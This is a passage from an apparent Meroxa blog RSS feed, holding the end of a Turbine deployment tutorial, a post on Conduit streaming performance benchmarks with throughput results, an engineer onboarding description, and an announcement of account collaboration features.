&lt;p&gt;💡 &lt;code class=&quot;language-text&quot;&gt;await turbine.process&lt;/code&gt; allows developers to write a function that will be run on each record. If you need to pre-process your data before sending it to your Kafka topic you can write your code here.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Deploying Your App&lt;/p&gt;
&lt;p&gt;Commit your changes&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;&lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;add&lt;/span&gt; &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;  $ &lt;span class=&quot;token function&quot;&gt;git&lt;/span&gt; commit &lt;span class=&quot;token parameter variable&quot;&gt;-m&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;Initial Commit&quot;&lt;/span&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Deploy your app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps deploy  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once your app is deployed you will see your Kafka Topic populate all the data from the PostgreSQL table. You can also insert a record to your table to see it stream over live in Confluent Cloud!&lt;/p&gt;
&lt;p&gt;Meroxa will set up all the connections and remove the complexities, so you the developer can focus on the important stuff.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Have questions or feedback?&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;If you have questions or feedback, reach out directly by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Happy Coding 🚀&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Testing the Limits: Performance Benchmarks for Conduit]]></title><description><![CDATA[We decided to build a performance benchmark for Conduit early, so we could determine how much it can handle and what it takes to break it.]]></description><link>https://meroxa.com/blog/performance-benchmarks</link><guid isPermaLink="false">https://meroxa.com/blog/performance-benchmarks</guid><dc:creator><![CDATA[Haris Osmanagić]]></dc:creator><pubDate>Thu, 03 Nov 2022 12:46:30 GMT</pubDate><content:encoded>&lt;p&gt;Introduction&lt;/p&gt;
&lt;p&gt;Conduit is meant as a Kafka Connect replacement with better developer experience but it’s just as easy to use it to build real-time data pipelines. For that reason, we didn’t want to wait for too long to know how much Conduit can handle, or what it takes to break Conduit. To answer the two questions, we developed a &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/&quot;&gt;benchmarking tool&lt;/a&gt;. In this blog post, we’ll share our experience building it and using it.&lt;/p&gt;
&lt;p&gt;Types of performance testing&lt;/p&gt;
&lt;p&gt;There are &lt;a href=&quot;https://en.wikipedia.org/wiki/Software_performance_testing&quot;&gt;different types&lt;/a&gt; of performance testing, and in Conduit we started with the following three:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load testing (i.e. testing Conduit with expected load)&lt;/li&gt;
&lt;li&gt;Stress testing (i.e. testing Conduit with unusually high load)&lt;/li&gt;
&lt;li&gt;Spike testing (i.e. testing Conduit with suddenly increasing or decreasing loads)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We do not plan to stop here, and we plan to expand our tests to include other types of performance testing (especially soak and capacity testing).&lt;/p&gt;
&lt;p&gt;Principles&lt;/p&gt;
&lt;p&gt;Firstly, let’s mention the principles upon which we built this version of benchmarks:&lt;/p&gt;
&lt;p&gt;It should be possible to track performance of Conduit itself (i.e. without connectors included)&lt;/p&gt;
&lt;p&gt;One thing we’re especially interested in is the performance of Conduit itself. Let’s remember what a pipeline looks like:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/xd-68zH-VyMRIrj-M7NyBzO6CmbO2jsfVMIcYuFoX5MdcLPNyHeWUln_NEZYL0u74MSxqUz6mRGBd76QMmXuI24ZAqkAHLad4jQAdec67yc3Jbcu403ZsLuCM1EWEQee-7qD6gtL57ZDW1g9CyQQ25Tpsp-Onc6kqLJe4MDzswbB2wBeBhIWebONfg&quot; alt=&quot;Diagram&quot;&gt;&lt;/p&gt;
&lt;p&gt;Connectors are pluggable components which can greatly affect the performance of a pipeline. For that reason, we decided to have a number of tests which will cancel out the effects of connectors. We achieved this using two special types of connectors:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;A &lt;a href=&quot;https://github.com/ConduitIO/conduit-connector-generator&quot;&gt;generator&lt;/a&gt; source, for which generating a record comes at virtually no cost, but can be configured to send data at a specified rate (or rates, to simulate spikes).&lt;/li&gt;
&lt;li&gt;A NoOp destination which simply drops all records without doing anything.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;It should be possible to track performance of Conduit with the connectors included&lt;/p&gt;
&lt;p&gt;While zooming in on Conduit’s performance is definitely helpful, we do not want the performance testing framework to restrict us into that, and not make it possible to test Conduit with connectors. This would be helpful for a number of reasons:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;To know what, and what not to expect from a production environment&lt;/li&gt;
&lt;li&gt;To try reproducing behavior from a production environment&lt;/li&gt;
&lt;li&gt;To conduct a performance test on a connector you developed (e.g. you may have developed a source connector, so you can test it using the NoOp destination connector)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Benchmarks are run on-demand (automated benchmarks are planned for later)&lt;/p&gt;
&lt;p&gt;As a first step, it’s acceptable if the performance tests are run manually. Automated tests are a great tool to compare the performance of two releases, or making sure that code changes didn’t introduce degradations. However, before answering the question “&lt;em&gt;was this a good change from a previous state?”&lt;/em&gt;, we need to establish a baseline*.* Automated benchmarks &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/424&quot;&gt;are on our roadmap&lt;/a&gt;, and with that we hope to be able to answer both questions.&lt;/p&gt;
&lt;p&gt;It&apos;s easy to manage workloads&lt;/p&gt;
&lt;p&gt;Workloads are one of the most important parts in a performance test, and so we’d like to be able to easily add them. In Conduit’s case, there are two significant parts of a workload:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Conduit’s own configuration&lt;/li&gt;
&lt;li&gt;Pipeline setup&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Ideally, both configurations can exist in files. At the time of developing the benchmarking framework, the pipeline file configurations were in progress, so the way workloads are specified is via Bash scripts, which create pipelines using the HTTP API. &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/d8458e386612082264c242f7553c8d9b12fa8608/workloads/small-messages-burst.sh&quot;&gt;Here&lt;/a&gt; you can find an example of a workload, which simulates bursts, i.e. conducts spike testing.&lt;/p&gt;
&lt;p&gt;The connector configuration (which is what is used to generate load) can be clearly seen in the scripts. Still, the scripts are relatively verbose and we plan to replace them with &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/32&quot;&gt;pipeline configuration files&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Metrics of interest&lt;/p&gt;
&lt;p&gt;When we set out to write the benchmarking framework, one of the first questions we answered was “&lt;em&gt;what are we actually interested in?”.&lt;/em&gt; Generally speaking, in performance tests we want to know how fast the work was performed, but also what resources have been used.&lt;/p&gt;
&lt;p&gt;As for the “work performed” part, we chose to monitor the number of records per second and the number of bytes per second, as they are the most important indicators of a pipeline’s performance. If you have metrics related to individual objects/events (for example, we track the time Conduit spends on a record), it’s also useful to show percentiles.&lt;/p&gt;
&lt;p&gt;With regards to resource usage, we’re generally interested in CPU and memory usage. Conduit itself doesn’t use disk or network heavily, so we’re not keeping a close eye on those.&lt;/p&gt;
&lt;p&gt;Data collection&lt;/p&gt;
&lt;p&gt;Regardless of what metrics you define, all the data collected needs to be linked to the actual test it belongs to. This can be the test name, a timestamp, version of the system you’re testing, or version of the test framework, etc.&lt;/p&gt;
&lt;p&gt;Conduit comes with a number of already defined metrics. The metrics available are exposed through the HTTP API and ready to be scraped by Prometheus. You can find more information about the metrics &lt;a href=&quot;https://github.com/ConduitIO/conduit/blob/main/docs/metrics.md&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;With that, using a tool like Grafana to monitor Conduit makes a lot of sense. While we do monitor Conduit through Grafana too, it’s not how we primarily do it. Eventually, we’d like to be able to compare metrics from different test runs (e.g. to check if there were performance degradations between two releases). Comparing the results using Prometheus or Grafana cannot be done easily, so we wrote &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/blob/main/main.go&quot;&gt;a simple tool&lt;/a&gt; which will collect Conduit-specific metrics and save them to a CSV file.&lt;/p&gt;
&lt;p&gt;When it comes to collecting data about resource usage, we are doing it in two ways. The first is instrumenting Conduit by using the &lt;a href=&quot;https://github.com/prometheus/client_golang/&quot;&gt;Prometheus client library&lt;/a&gt;, which gives us a lot of information about the internals (e.g. memory allocation, heap statistics, number of goroutines, etc.). The second is by using DataDog, which we use for the general VM stats (mostly for CPU and memory related metrics).&lt;/p&gt;
&lt;p&gt;Here’s a tip if you’re visualizing your data: implement a break between test runs. Otherwise, once test N is done, and test N+1 starts immediately after it, you might only see a fall or an increase on your graph. That can make it more difficult to correlate the test results and your graphs.&lt;/p&gt;
&lt;p&gt;Target instance&lt;/p&gt;
&lt;p&gt;We recommend running Conduit on an instance with 2 CPUs and 4 GB of RAM, so we’re running the tests against VMs with the same specifications.&lt;/p&gt;
&lt;p&gt;The test framework we developed can run the tests either against Conduit in Docker containers or against Conduit installed on an AWS EC2 instance (sidenote: we have a &lt;a href=&quot;https://docs.conduit.io/docs/Deploy/aws_ec2/&quot;&gt;great guide&lt;/a&gt; for launching an AWS EC2 instance and installing Conduit from scratch!).&lt;/p&gt;
&lt;p&gt;When it comes to testing on EC2 instances, here’s a couple of things we’d like to share with you:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Don’t forget about them! Especially if you’re not using them very often. Otherwise, your next AWS bill may be a big surprise.&lt;/li&gt;
&lt;li&gt;Be well informed about throttling on the instance you’re using. Certain types of instances will be throttled once you run out of credits, which may affect the test results.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Data evaluation&lt;/p&gt;
&lt;p&gt;The first step here is to actually question the data. This is especially important in cases where you’ve written some code yourself to expose certain metrics or to collect them. For example:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Have you calculated a metric correctly?&lt;/li&gt;
&lt;li&gt;Are the units correct and expected (nanoseconds vs milliseconds, megabytes vs mebibytes, etc.)?&lt;/li&gt;
&lt;li&gt;Are you able to cross check the metrics? (e.g. if a pipeline rate is shown as 100 records per second, do you actually see 6000 records in a destination after 60 seconds?)&lt;/li&gt;
&lt;li&gt;Are time zones matching? (e.g. when checking resource usage, make sure you see the same time zones in your resource graphs and your test results)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Once you are confident in your test results, you can actually start evaluating the data. Here are a few questions which may help:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;em&gt;Is the data in a test result consistent?&lt;/em&gt; If not, why not? For example, in some test results we saw that Conduit spent 100ms on a record (figures are for illustrative purposes), so you may expect a throughput of 10 records per second. However, the throughput was actually much higher. We then recalled there was some concurrent processing involved, which explained the numbers.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;What’s the relationship between a workload and the resource usage?&lt;/em&gt; Are you seeing the expected increase in resource usage when you increase the workload in a specific way? For example, in our tests with large records, we do expect the memory to go up. Or, if you have spike tests, does the resource usage go back to normal once a burst is done?&lt;/li&gt;
&lt;li&gt;&lt;em&gt;Is there a relationship between different workloads?&lt;/em&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Results and observations&lt;/p&gt;
&lt;p&gt;Large messages (4MB payloads)&lt;/p&gt;
&lt;p&gt;By default, gRPC messages are limited to 4 MB in size. We also think that messages in data streams are much smaller than that in the majority of cases, so this feels like a good test. We have two variations of this test: one with a rate of 100 msg/s and one with a rate of 1000 msg/s.&lt;/p&gt;
&lt;p&gt;At a rate of 1000 msg/s, the throughput is around 200/s. We did expect a smaller rate, but this is something we’re going to look into and try improving.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/mFY-Cx3g3ZP1PJQ9fnk40AIIgJojgSud5XrjkkdaDLpAQBc0FmAC-LkiNA5DBGFgOjqGYKBNR2WUOdgfIyGTXr17w95fMa0wZ5fqjwiglWdofB1hSOxAtZqPu5H9SjxYkmr8DVpJkU06e7URCvux2NADqAGfJ1XPdVEiog6SwJmzbgZHiAwBEDv0rA&quot; alt=&quot;Graph: CPU usage for large message payloads&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/7M95og3Xl99dC7myCUf4BOVVSP3oMwbD33oMvj1ievHP07IZx-wUL8kDzL27br2VFH0n7nuBlJMOCd9AcJhJfk8aTjaHaeDMK0GVnW7DXLRCyaYVZ-Q8VmHOpN8rR2XKth3zP8B8u6AjtNvrdR_KChZ_00IMpCG4JkDTla8snIntcY14p4yI2kYfXg&quot; alt=&quot;Graph: Pipeline throughput for large message payloads&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/11f3KphTeUFsqZnyG7c2a1OZIscrN3YILvm_2AE4aTudzfbV0WFQXDxUyAl-IeMAcAJ-LzWeiGvKGxFDzXUn30pmcCRei4AFVOB_WG74UrPbadqEdcUOV9Gp2RpSiWwF_EORYQ0Q2foqBCb39HQmBHTeFBaEq-ZldnAWD18OZilCJLWPgMtlkS5XiA&quot; alt=&quot;Graph: Memory usage for large message payloads&quot;&gt;&lt;/p&gt;
&lt;p&gt;Small messages, high rates&lt;/p&gt;
&lt;p&gt;We ran a few tests with message payloads which are 1 KB in size. The rates were: 10k msg/s, 15k msg/s, 20k msg/s.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;th&gt;&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Generator rate&lt;/td&gt;
&lt;td&gt;Pipeline rate&lt;/td&gt;
&lt;td&gt;CPU (%)&lt;/td&gt;
&lt;td&gt;Memory usage (GB)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;10 000&lt;/td&gt;
&lt;td&gt;6 650&lt;/td&gt;
&lt;td&gt;46&lt;/td&gt;
&lt;td&gt;1.4&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;15 000&lt;/td&gt;
&lt;td&gt;10 550&lt;/td&gt;
&lt;td&gt;55&lt;/td&gt;
&lt;td&gt;1.55-1.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;20 000&lt;/td&gt;
&lt;td&gt;13 270&lt;/td&gt;
&lt;td&gt;62&lt;/td&gt;
&lt;td&gt;1.55-1.7&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;“Insane”(the generator sends records as quickly as possible)&lt;/td&gt;
&lt;td&gt;29 000&lt;/td&gt;
&lt;td&gt;77&lt;/td&gt;
&lt;td&gt;1-1.4 GB&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;As we see, the actual throughput is roughly 70% of the configured generator rate. We have &lt;a href=&quot;https://github.com/ConduitIO/conduit/issues/571&quot;&gt;an issue&lt;/a&gt; open to investigate this difference. We hypothesize that, at higher rates, the ratio between the time the generator sleeps and the time it takes to return and acknowledge a record becomes more significant. In other words, it’s possible that, at a higher rate, the generator produces less records than specified.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Bonus workload:&lt;/strong&gt; We have a workload, where the messages are generated as quickly as possible by the generator.&lt;/p&gt;
&lt;p&gt;Small message bursts&lt;/p&gt;
&lt;p&gt;In this workload, we have a generator producing 10 msg/s, and then we have 30-second bursts, which happen every 30 seconds, and where we have 1000 msg/s.&lt;/p&gt;
&lt;p&gt;The CPU usage was oscillating between 0 and 10%, where the time between peaks was exactly 60 seconds, which corresponds to the configured burst time.&lt;/p&gt;
&lt;p&gt;Improvement loops&lt;/p&gt;
&lt;p&gt;Last but not least, let the tests “soak” a little bit. Running them periodically or even frequently will let you know how to make them more efficient, easier to run, and what additional metrics you may need or not. Another way to improve your benchmark is by open-sourcing it, letting others use it and suggest improvements. Here’s us doing that &lt;a href=&quot;https://github.com/ConduitIO/streaming-benchmarks/&quot;&gt;here&lt;/a&gt;. Looking forward to your questions, comments and suggestions!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Welcome to Meroxa: Your First Month at Meroxa as an Engineer]]></title><description><![CDATA[Starting a new job can feel like drinking from a firehose for the first few weeks. Meroxa has engineered the onboarding process to help create a smooth transition.]]></description><link>https://meroxa.com/blog/your-first-month-at-meroxa-as-an-engineer</link><guid isPermaLink="false">https://meroxa.com/blog/your-first-month-at-meroxa-as-an-engineer</guid><dc:creator><![CDATA[Diana Doherty]]></dc:creator><pubDate>Thu, 03 Nov 2022 12:45:07 GMT</pubDate><content:encoded>&lt;p&gt;On your first day at a company, you’re welcomed into a new team with new people, new culture, new technologies, and new code. Getting familiar with the novelty can be overwhelming. If this new job is also remote, you’ll be faced with additional challenges. Where those lunches and runs for coffee in the office presented opportunities to get to know your coworkers, these opportunities aren’t available; they need to be created.&lt;/p&gt;
&lt;p&gt;It’s important for companies to set up their new employees for long-term success. By creating a place of psychological safety, and acclimating them into company culture, new employees can prosper and feel fulfilled in their new role.&lt;/p&gt;
&lt;p&gt;At Meroxa, we onboard engineers by presenting them with a clear plan, the freedom to complete each task in their preferred timezone and working hours, and establishing a strong focus on pairing.&lt;/p&gt;
&lt;p&gt;Let’s dive deeper into what your onboarding experience could look like at Meroxa.&lt;/p&gt;
&lt;h3&gt;Before Day 1&lt;/h3&gt;
&lt;p&gt;Your onboarding process starts before your first day.&lt;/p&gt;
&lt;p&gt;Before you start, we’ll ask you to complete a questionnaire. We want to know your laptop preferences, logistical details, and more about you!&lt;/p&gt;
&lt;p&gt;Once we receive your response, we’ll:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Assign you an onboarding buddy.&lt;/li&gt;
&lt;li&gt;Create accounts and send out invites for necessary engineering and operations tooling.&lt;/li&gt;
&lt;li&gt;Provide you access to your company email, including calendar invites for the people you’ll meet on your first day!&lt;/li&gt;
&lt;li&gt;Ship you a personalized care package. We always try to find a mix of things with a personal touch and a few new things to explore! Everyone gets a set of common presents (it’ll be a surprise!), but I also got a tiramisu (my favorite dessert!) from a local bakery and an at-home ceramics kit!&lt;/li&gt;
&lt;li&gt;Send out a laptop from your selection of Macbooks to Linux machines.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By tackling these tasks ahead of time, we ensure that you’re not left alone, or lost during your first day.&lt;/p&gt;
&lt;h3&gt;Day 1&lt;/h3&gt;
&lt;p&gt;On your first day, the operations team will welcome you with a personalized scrum board full of your onboarding tasks for the month. They’ll walk through your onboarding document (found in the scrum board) that will familiarize you with external services (both operations and engineering related), instruct you on how to download engineering tools, and guide you through the setup of our end-to-end dev environment locally.&lt;/p&gt;
&lt;p&gt;Next, you’ll meet your onboarding buddy! For the smoothest experience, we try to ensure your buddy:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lives in a timezone at, or close to yours&lt;/li&gt;
&lt;li&gt;Is part of your new team, or is knowledgeable in your new domain of work&lt;/li&gt;
&lt;li&gt;Can create a safe and comfortable space for you to ask for help or ask any questions that may arise&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Your onboarding buddy is a guide and your primary point of contact as you come up to speed on all things Meroxa.&lt;/p&gt;
&lt;p&gt;As people start their work days, the #general slack channel comes alive with different pings from your new coworkers welcoming you to the team. This will be the perfect opportunity to greet them, and join the myriad hobby slack channels: #cutebeasts, #art, #games, #women_at_meroxa, #home-improvement, #food, and plenty more!&lt;/p&gt;
&lt;h3&gt;Week 1&lt;/h3&gt;
&lt;p&gt;During your first week, you and your manager will set up the cadence and structure of your 1-on-1s. Your first couple of sessions are the perfect time to discuss and document your goals for the first 30/60/90 days, and align your yearly goals to Meroxa’s company values.&lt;/p&gt;
&lt;p&gt;Daily check-ins with your onboarding buddy are a time to get insights on the structure of specific repositories, more info on the engineering lifecycle, and help setting up your tools and permissions if you need them.&lt;/p&gt;
&lt;p&gt;The product team will give you a tour of our product offerings, and you’ll be meeting with other engineers for the architectural overview.&lt;/p&gt;
&lt;p&gt;By the end of the week, you should have a clearer understanding of how everything works together, and will hopefully be ready to build your first Turbine application! Turbine is a data application framework for building server-side applications that are event-driven, respond to data in real-time, and scale using cloud-native best practices. To get started with Turbine, check out our &lt;a href=&quot;https://docs.meroxa.com/turbine/get-started/&quot;&gt;getting started guide&lt;/a&gt;!&lt;/p&gt;
&lt;h3&gt;Month 1&lt;/h3&gt;
&lt;p&gt;Most of our backend components are written in Go, and our front end is JavaScript and Ember. If you are unfamiliar with any of the languages you’ll be working with this is your time to learn! The yearly educational fund should supply the right books and courses to suit your needs. We have slack channels for a variety of topics other people are learning, and you’re encouraged to join the discussion! Joining those channels provides you with a good opportunity to connect with other learners about the same topic, and a curated list of resources people previously used in their learning journey.&lt;/p&gt;
&lt;p&gt;Soon enough, you’ll be ready for your first ticket. Your onboarding buddy will encourage you to pair with them on this task. Once the ticket is complete, you will receive a detailed and prompt Pull Request review. Pull Requests are a great opportunity to further your knowledge about our components and best practices. Take the time to learn by observing and reviewing other PRs as well. Know that a PR’s intention should be clear, even when someone new is looking in, so if you don’t understand something, ask as a comment in the PR! If you need more help, ask your onboarding buddy to be there to review PRs with you.&lt;/p&gt;
&lt;p&gt;One of your tasks for the month is to pair at least five times with different team members. As intimidating as that might seem, it’s intended to give you a friendly introduction to our components, introduce you to more people on the team, and get accustomed to pairing when you are stuck.&lt;/p&gt;
&lt;p&gt;Another onboarding task will be to schedule 1-on-1s with people across the organization. This is a time to connect on mutual interests, and better understand their work domain.&lt;/p&gt;
&lt;h3&gt;Feedback&lt;/h3&gt;
&lt;p&gt;Our onboarding process is never complete; it is an iterative process that should always be made better for the next person. If you experience setbacks or tension at any point during onboarding, make a ticket outlining your desired changes, and if you’re up for it, tackle it!&lt;/p&gt;
&lt;p&gt;If you’re interested in Meroxa and would like to experience our onboarding process firsthand, check out our &lt;a href=&quot;https://jobs.lever.co/meroxa&quot;&gt;openings&lt;/a&gt;! Can’t wait to have our first pairing session! :)&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Introducing Collaboration for the Meroxa Platform]]></title><description><![CDATA[With Meroxa’s newest feature, developers can now easily invite their teammates to their account to share resources and build data applications together.]]></description><link>https://meroxa.com/blog/introducing-collaboration-for-the-meroxa-platform</link><guid isPermaLink="false">https://meroxa.com/blog/introducing-collaboration-for-the-meroxa-platform</guid><dc:creator><![CDATA[Jennifer Hudiono]]></dc:creator><pubDate>Tue, 01 Nov 2022 18:09:36 GMT</pubDate><content:encoded>&lt;p&gt;As we navigate working in remote, hybrid, or in-office environments, collaboration continues to play an important role for teams. Collaboration enables teams to share knowledge so they can work more efficiently and effectively. Today we introduce the first step towards making Meroxa a collaborativereal-time code-first stream processing application platform for developers.&lt;/p&gt;
&lt;p&gt;Data applications offer developers a powerful solution to work with event-driven and streaming architectures. A lone developer does not have to be encumbered by the complexity of this challenge. With Meroxa’s newest feature, developers can now easily invite their teammates to their account to share resources and build data applications together. We’re excited to take this step and see what we can build together!&lt;/p&gt;
&lt;p&gt;“Alone we can do so little; together we can do so much.&quot; – Helen Keller&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Inviting Users&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To start collaborating with your teammates, sign into your &lt;a href=&quot;https://auth.meroxa.io/login?state=hKFo2SAwaXNxc1Z1c0lBRW5UakVSdVpXckdfZm5BYTlJeVdJcaFupWxvZ2luo3RpZNkgWWVsdlFqSFQ2U0dmbXRZZTlfeDBRRE9UMUxRb2szQzajY2lk2SBUeTJQeUxiZGFoNnBJcVJaaXEzdXhod0Exdmh2ZzZDNg&amp;#x26;client=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;protocol=oauth2&amp;#x26;redirect_uri=https%3A%2F%2Fdashboard.meroxa.io%2Fcallback&amp;#x26;audience=https%3A%2F%2Fapi.meroxa.io%2Fv1&amp;#x26;scope=openid+profile+email+user&amp;#x26;response_type=code&amp;#x26;response_mode=query&amp;#x26;nonce=My1BWC1hQ19PV3NRQ0s1OUxTeVBVWkpkQnM3cDBJYVhSZ2x2aDJpa3dKQg%3D%3D&amp;#x26;code_challenge=isNivbkYteLoh9DCX_LCMjirdSO4MxSMLbO6GKWumEc&amp;#x26;code_challenge_method=S256&amp;#x26;auth0Client=eyJuYW1lIjoiYXV0aDAtc3BhLWpzIiwidmVyc2lvbiI6IjEuMTQuMCJ9&amp;#x26;mode=login&quot;&gt;Meroxa account&lt;/a&gt; and click on your &lt;strong&gt;profile icon&lt;/strong&gt; and go to &lt;strong&gt;Settings&lt;/strong&gt;. Under the &lt;strong&gt;Account&lt;/strong&gt; tab, you can rename your account from the default account name given to help better identify the shared account with your teammates.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/5FEeScfZWZiukwByRgQTlSGWxhslSgXGF3EHNbwGUItst943ZLJIow2lcaHPsN_0jzYuJXI7NTlVJ0Xr1-xQU-023sHS8d5vLepSQYXfa_Trg7a7VOIw57UbP_ii2KHAeSl660GYFJVtrWj0rH1LD2_ZgYf4Oou9tHH9Qco0N4K5xcjB1XmKDxzF3Q&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;After setting the account name, go to the &lt;strong&gt;Users&lt;/strong&gt; tab to start inviting users to your account.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/-1jCKUgBcP1ao2UPmhPqQIT6i_PURMCCResDKenn_QtF3A0aIGOkEEPgW7RhoRvlA4FVXZUo05EIKXJz0pe-iSzkhTzwcdf6b7ou36Tu_kX_NYeLuft1viYnJGWTR75vcNVJ3mQRsVXS4J_87_eMxqPuZPkSvH9Tt14X-Fx23u_9eC8YZXuLZ2mIhw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;The &lt;strong&gt;Users&lt;/strong&gt; tab is where you can easily manage all the users in the account. When a user is added, they will receive an invite email that will ask them to accept the invite to join your workflow. Each member of the team must have their own dedicated account, therefore new users to Meroxa will be directed to create an account before they can officially accept the collaboration invite. If a user already has an existing Meroxa account, they will have the option to sign-in.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh4.googleusercontent.com/065F1M4XShJGNl0aVaOKE0WwEolJ204lzdHfc1S37ZEfUcYtFk3SJYJen2QS3LxYFUQSpZoHVRTrzvMokyOeRGEtfXqp1MOx-AbDYKVzK2kYoZgjg0lxJuuTTRme8vzeMMHCvIpLo3LukkNhb4D47OXecZV3er-wMRyrDlWwNmri8E1AXyp-M5HxIw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Setting Accounts&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Multiple Accounts&lt;/p&gt;
&lt;p&gt;If you have multiple accounts with Meroxa, you will be able to navigate and switch between your accounts in the dashboard and in the CLI.&lt;/p&gt;
&lt;p&gt;Note: Resources and applications belong to a specific account. They cannot be shared between accounts, so ensure you have the right account selected when creating any resources or applications.&lt;/p&gt;
&lt;p&gt;In the dashboard, you can click on your profile icon to switch between your accounts.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh3.googleusercontent.com/uMf8KH3ol5Y-awHmJ_h9GVMpNHA1I06Imo-xT4pdQecealRXNWwgVAkI6Q1LBHMCRi_8TDProt091bLWRw0a3GPi8d-s4f4Rp9ilV7KBy1I9Rty2rmmUhd8ersZnzhPWRKSSZyGwhgRs6AFRyvkwVQd_DjGy7oh7wSbygKFWXMYTwUXbH5Yo4ePvZw&quot; alt=&quot;UI screenshot&quot;&gt;&lt;/p&gt;
&lt;p&gt;In the CLI, you can run the following command to view and set your account.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://lh6.googleusercontent.com/hd_WeOim7BGaYEY-tBvwZMZr6nhNFn34P8a2T6HExhDAOpiy-lpR01tFNuJopaTxunifIFPB6jy1Lvo27iI6KYw22nJ61ITbXKAsKti0zuDVp79SKPsZrK_G-SHlhKVsHSqMicXegUDV_LDKlt9c44QQqMQ06rexfEe2Ylxvrspc_Rsry12_tK8dBw&quot; alt=&quot;Terminal screenshot&quot;&gt;&lt;/p&gt;
